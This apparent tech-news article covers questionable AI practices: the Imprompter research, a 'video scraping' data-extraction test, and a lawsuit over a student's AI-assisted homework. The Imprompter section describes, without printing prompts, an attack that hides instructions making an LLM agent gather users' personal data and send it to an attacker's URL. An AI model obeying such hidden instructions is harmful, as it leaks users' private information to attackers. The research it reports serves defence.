
Emerging Technology
Into The World Of Questionable AI Practices
Updated on Fri, Oct 18, 2024
Recently, we reported that Accel’s Euroscape 2024 noted that 40% of venture capital funding for cloud companies is now being directed toward GenAI startups in the European region. While this started eating away at the money available for other technologies in the cloud industry, it also found that investments in AI improved the outlook for other technologies.
It’s no secret that AI and GenAI are revolutionizing industries and turning more than just a few heads.
However, at the same time, it’s leading to companies transforming employee roles and, in some cases, even replacing them.
This was expected, with a wide range of industry leaders pointing out that the technology will not just replace people in some processes but also replace some processes. Most prominently, NVIDIA’s boss Jensen Huang spoke about how the need for human coders will soon be something from the past.
Yet, the question must be asked about the ill effects and drawbacks of AI. Here, the question of personal safety comes into the picture, considering people who may not even be related to the technology can be affected, as is the case when it was found that millions of people use AI bots to create deepfake nudes on Telegram.
Elsewhere, the world of AI was privy to a wide range of questionable practices that may not necessarily be illegal or harmful but certainly raised questions about their use.
AI Tools For Extracting Personal Details
Researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore weaponized an algorithm that can turn malicious prompts into a set of hidden instructions that can gather a user’s personal information from chats, which can then be sent to hackers.
This includes information such as names, ID numbers, payment card details, email addresses, mailing addresses and more.
Called Imprompter, the algorithm tells the LLM to find personal information and link it to a URL, which will then be sent to the hacker’s domain. As per the researchers, the activity enjoyed an 80% success rate.
Xiaohan Fu, the lead author of the research and a computer science PhD student at UCSD, said, “The effect of this particular prompt is essentially to manipulate the LLM agent to extract personal information from the conversation and send that personal information to the attacker’s address. We hide the goal of the attack in plain sight.”
AI Tools For Video Scraping
In a blog post, AI researcher Simon Willison recently tested a technique he calls "video scraping" to extract data from cloud service emails, where, instead of manually inputting scattered charges from twelve emails, he recorded a 35-second screen capture and fed it into Google's AI Studio.
Then, using the Gemini 1.5 Flash AI model, he instructed the tool to pull relevant dates and charges and convert the data into a JSON format, which Willison later formatted as a CSV for spreadsheet use.
The process was successful and incredibly cost-effective (using just 11,018 tokens and costing less than a tenth of a cent) and Willison didn’t end up paying anything (as Google AI Studio offers free services). However, the question of privacy issues arises.
While Wilson used it for his personal requirements and he decided what content would be used, if bad actors were to gain access to a user’s machine, it would introduce a new form of privacy invasion and autonomous spying.
As such, this could enable hackers to access recorded data in one place and act on it later.
AI Tools For Homework
A student from Hingham High School in Massachusetts was punished for using AI tools in his assignment, leading to the boy’s parents suing the school district.
The parents allege that nowhere in the handbook does any rule restrict the use of AI. #UnoReverse
Jennifer and Dale Harris, the boy’s parents filed the lawsuit in Plymouth County Superior Court and the case was then moved to US District Court for the District of Massachusetts.
“They told us our son cheated on a paper, which is not what happened,” said Jennifer Harris, adding, “They basically punished him for a rule that doesn't exist.”
On the other hand, the school’s officials said that the boy admitted to using AI tools to generate ideas and more, while also pointing out that the student’s handbook deals with cheating and plagiarism in a section. It bans “unauthorized use of technology during an assignment” and “unauthorized use or close imitation of the language and thoughts of another author and the representation of them as one's own work.”
Ahead of the handbook, the officials cited a “written policy on Academic Dishonesty and AI expectations” that was shared with the students in fall 2023. The policy stated that students “shall not use AI tools during in-class examinations, processed writing assignments, homework or classwork unless explicitly permitted and instructed.”
While the verdict of this move is yet to be determined to be illegal or not, it brings up concerns about the future of education and the harmful effects of taking shortcuts in a process that requires students to use their natural intellect rather than artificial intelligence.
Do you think governments and AI companies need to ascertain the future of AI and GenAI before proceeding with its growth or do you think AI companies should be allowed to explore where the technology goes without any restrictions?
Let us know in the comments below!
First published on Fri, Oct 18, 2024
Enjoyed what you've read so far? Great news - there's more to explore!
Stay up to date with the latest news, a vast collection of tech articles including introductory guides, product reviews, trends and more, thought-provoking interviews, hottest AI blogs and entertaining tech memes.
Plus, get access to branded insights such as informative white papers, intriguing case studies, in-depth reports, enlightening videos and exciting events and webinars from industry-leading global brands.
Dive into TechDogs' treasure trove today and Know Your World of technology!
Disclaimer - Reference to any specific product, software or entity does not constitute an endorsement or recommendation by TechDogs nor should any data or content published be relied upon. The views expressed by TechDogs' members and guests are their own and their appearance on our site does not imply an endorsement of them or any entity they represent. Views and opinions expressed by TechDogs' Authors are those of the Authors and do not necessarily reflect the view of TechDogs or any of its officials. While we aim to provide valuable and helpful information, some content on TechDogs' site may not have been thoroughly reviewed for every detail or aspect. We encourage users to verify any information independently where necessary.
Trending TD NewsDesk
OpenAI’s ChatGPT Company Knowledge & AI Music Tool Comes Amid $22.5B SoftBank Investment
Target Cuts 1,800 Jobs & Meta To Drop 600 Employees Amid AWS Post-Layoff Woes
Microsoft's Copilot Fall Release: AI Updates For Edge, Actions, Group, & Mico
Amazon Delivery Boost: AI Smart Glasses, Million Robots & Also Cargo Vehicles
OpenAI Unveils UK Data Residency & Deals With UK Gov Amid WhatsApp Ban & More
Join Our Newsletter
Get weekly news, engaging articles, and career tips-all free!
By subscribing to our newsletter, you're cool with our terms and conditions and agree to our Privacy Policy.

Join The Discussion